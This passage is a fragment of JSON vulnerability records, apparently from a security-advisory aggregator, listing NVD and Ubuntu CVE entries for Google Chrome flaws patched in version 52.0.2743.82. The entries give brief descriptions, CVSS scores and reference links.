"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-1705", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1705"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106"], "id": "CVE-2016-1705", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1705", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:36:26", "description": "The CSPSource::schemeMatches function in WebKit/Source/core/frame/csp/CSPSource.cpp in the Content Security Policy (CSP) implementation in Blink, as used in Google Chrome before 52.0.2743.82, does not apply http :80 policies to https :443 URLs and does not apply ws :80 policies to wss :443 URLs, which makes it easier for remote attackers to determine whether a specific HSTS web site has been visited by reading a CSP report. NOTE: this vulnerability is associated with a specification change after CVE-2016-1617 resolution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-5137", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1617", "CVE-2016-5137"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106"], "id": "CVE-2016-5137", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5137", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:36:25", "description": "net/proxy/proxy_service.cc in the Proxy Auto-Config (PAC) feature in Google Chrome before 52.0.2743.82 does not ensure that URL information is restricted to a scheme, host, and port, which allows remote attackers to discover credentials by operating a server with a PAC script, a related issue to CVE-2016-3763.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-5134", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3763", "CVE-2016-5134"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106"], "id": "CVE-2016-5134", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5134", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*"]}], "ubuntucve": [{"lastseen": "2023-06-04T14:16:14", "description": "Use-after-free vulnerability in extensions/renderer/user_script_injector.cc\nin the Extensions subsystem in Google Chrome before 52.0.2743.82 allows\nremote attackers to cause a denial of service or possibly have unspecified\nother impact via vectors related to script deletion.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5136", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5136"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-5136", "href": "https://ubuntu.com/security/CVE-2016-5136", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-04T14:16:15", "description": "ios/web/web_state/ui/crw_web_controller.mm in Google Chrome before\n52.0.2743.82 on iOS does not ensure that an invalid URL is replaced with\nthe about:blank URL, which allows remote attackers to spoof the URL display\nvia a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-1707", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1707"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-1707", "href": "https://ubuntu.com/security/CVE-2016-1707", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-04T14:16:18", "description": "The Service Workers subsystem in Google Chrome before 52.0.2743.82 does not\nproperly implement the Secure Contexts specification during decisions about\nwhether to control a subframe, which allows remote attackers to bypass the\nSame Origin Policy via an https IFRAME element inside an http IFRAME\nelement.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5132", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5132"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-5132", "href": "https://ubuntu.com/security/CVE-2016-5132", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-04T14:16:16", "description": "The PPAPI implementation in Google Chrome before 52.0.2743.82 does not\nvalidate the origin of IPC messages to the plugin broker process that\nshould have come from the browser process, which allows remote attackers to\nbypass a sandbox protection mechanism via an unexpected message type,\nrelated to broker_process_dispatcher.cc, ppapi_plugin_process_host.cc,\nppapi_thread.cc, and render_frame_message_filter.cc.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-1706", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1706"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-1706", "href": "https://ubuntu.com/security/CVE-2016-1706", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-04T14:16:16", "description": "objects.cc in Google V8 before 5.2.361.27, as used in Google Chrome before\n52.0.2743.82, does not prevent API interceptors from modifying a store\ntarget without setting a property, which allows remote attackers to bypass\nthe Same Origin Policy via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mikesalvatore](<https://launchpad.net/~mikesalvatore>) | The Ubuntu Security Team does not support libv8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5128", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5128"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-5128", "href": "https://ubuntu.com/security/CVE-2016-5128", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-04T14:16:16", "description": "Google Chrome before 52.0.2743.82 mishandles origin information during\nproxy authentication, which allows man-in-the-middle attackers to spoof a\nproxy-authentication login prompt or trigger incorrect credential storage\nby modifying the client-server data stream.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5133", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5133"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-5133", "href": "https://ubuntu.com/security/CVE-2016-5133", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-04T14:16:14", "description": "The Chrome Web Store inline-installation implementation in the Extensions\nsubsystem in Google Chrome before 52.0.2743.82 does not properly consider\nobject lifetimes during progress observation, which allows remote attackers\nto cause a denial of service (use-after-free) or possibly have unspecified\nother impact via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-1708", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1708"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-1708", "href": "https://ubuntu.com/security/CVE-2016-1708", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-04T14:16:14", "description": "Heap-based buffer overflow in the ByteArray::Get method in\ndata/byte_array.cc in Google sfntly before 2016-06-10, as used in Google\nChrome before 52.0.2743.82, allows remote attackers to cause a denial of\nservice or possibly have unspecified other impact via a crafted SFNT font.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-1709", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1709"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-1709", "href": "https://ubuntu.com/security/CVE-2016-1709", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-04T14:16:16", "description": "Google V8 before 5.2.361.32, as used in Google Chrome before 52.0.2743.82,\ndoes not properly process left-trimmed objects, which allows remote\nattackers to cause a denial of service (memory corruption) or possibly have\nunspecified other impact via crafted JavaScript code.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mikesalvatore](<https://launchpad.net/~mikesalvatore>) | The Ubuntu Security Team does not support libv8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5129", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5129"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-5129", "href": "https://ubuntu.com/security/CVE-2016-5129", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-04T14:16:16", "description": "The ChromeClientImpl::createWindow method in\nWebKit/Source/web/ChromeClientImpl.cpp in Blink, as used in Google Chrome\nbefore 52.0.2743.82, does not prevent window creation by a deferred frame,\nwhich allows remote attackers to bypass the Same Origin Policy via a\ncrafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-1710", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1710"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-1710", "href": "https://ubuntu.com/security/CVE-2016-1710", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-04T14:16:16", "description": "content/renderer/history_controller.cc in Google Chrome before 52.0.2743.82\ndoes not properly restrict multiple uses of a JavaScript forward method,\nwhich allows remote attackers to spoof the URL display via a crafted web\nsite.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5130", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5130"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-5130", "href": "https://ubuntu.com/security/CVE-2016-5130", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-04T14:16:15", "description": "Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google\nChrome before 52.0.2743.82, allows remote attackers to cause a denial of\nservice or possibly have unspecified other impact via vectors related to\nthe XPointer range-to function.\n\n#### Bugs\n\n * <https://bugzilla.gnome.org/show_bug.cgi?id=768428 (private as of 2016-09-27)>\n * <https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=840554>\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5131", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5131"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-5131", "href": "https://ubuntu.com/security/CVE-2016-5131", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-04T14:16:15", "description": "WebKit/Source/core/html/parser/HTMLPreloadScanner.cpp in Blink, as used in\nGoogle Chrome before 52.0.2743.82, does not consider referrer-policy\ninformation inside an HTML document during a preload request, which allows\nremote attackers to bypass the Content Security Policy (CSP) protection\nmechanism via a crafted web site, as demonstrated by a\n\"Content-Security-Policy: referrer origin-when-cross-origin\" header that\noverrides a \"<META name='referrer' content='no-referrer'>\" element.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5135", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5135"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-5135", "href": "https://ubuntu.com/security/CVE-2016-5135", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-04T14:16:17", "description": "WebKit/Source/core/loader/FrameLoader.cpp in Blink, as used in Google\nChrome before 52.0.2743.82, does not disable frame navigation during a\ndetach operation on a DocumentLoader object, which allows remote attackers\nto bypass the Same Origin Policy via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-1711", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1711"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-1711", "href": "https://ubuntu.com/security/CVE-2016-1711", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-04T14:16:18", "description": "Use-after-free vulnerability in WebKit/Source/core/editing/VisibleUnits.cpp\nin Blink, as used in Google Chrome before 52.0.2743.82, allows remote\nattackers to cause a denial of service or possibly have unspecified other\nimpact via crafted JavaScript code involving an @import at-rule in a\nCascading Style Sheets (CSS) token sequence in conjunction with a\nrel=import attribute of a LINK element.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5127", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, 